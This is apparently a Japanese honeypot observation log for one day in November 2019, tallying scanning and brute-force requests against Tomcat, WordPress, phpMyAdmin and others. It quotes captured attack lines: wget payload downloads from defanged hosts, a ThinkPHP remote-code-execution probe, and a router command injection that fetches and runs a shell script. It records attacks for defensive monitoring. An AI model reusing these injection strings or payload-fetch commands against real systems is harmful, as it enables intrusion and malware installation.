WOWHoneypot観察(256日目)
2019/11/27(水)
トータルは5319件でした。
ハンティングログは以下です。
119.115.210[.]170 wget -c hxxp[:]//103.254.73[.]113:2000/VIP |
119.115.210[.]170 wget -c hxxp[:]//wap[.]tfddos[.]net:57843/linux |
106.12.10[.]203 wget hxxp[:]//54.37.74[.]232/sh |
件数 | 概要 | リクエスト |
---|---|---|
5162 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
42 | アクセス | GET / |
13 | WordPressへのブルートフォース攻撃 | POST /wp-login.php |
13 | WordPressの調査 | GET /wp-login.php |
7 | phpMyAdminの調査 | GET /scripts/setup.php |
7 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
7 | phpMyAdminの調査 | GET /phpmyadmin/setup.php |
7 | phpMyAdminの調査 | GET /phpmyadmin/scripts/_setup.php |
7 | phpMyAdminの調査phpMyAdminの調査 | GET /mysql/scripts/setup.php |
7 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
7 | phpMyAdminの調査 | GET /imp/test.php |
7 | phpMyAdminの調査 | GET /_phpmyadmin/scripts/setup.php |
7 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
4 | Apache Struts2の調査 | GET /index.action |
3 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
2 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
2 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
2 | ZmEuによるphpMyAdminの調査 | GET /w00tw00t.at.ISC.SANS.DFind:) |
1 | WordPressのPingbackの調査 | POST /xmlrpc.php |
1 | 調査 | OPTIONS / |
1 | 調査 | GET /version |
1 | 調査 | GET /script |
1 | phpMyAdminの調査 | GET /phpmyadmin |
1 | ルーターの脆弱性を狙った通信 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp[:]//54.37.74[.]232/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ |
1 | 調査 | GET /index.php |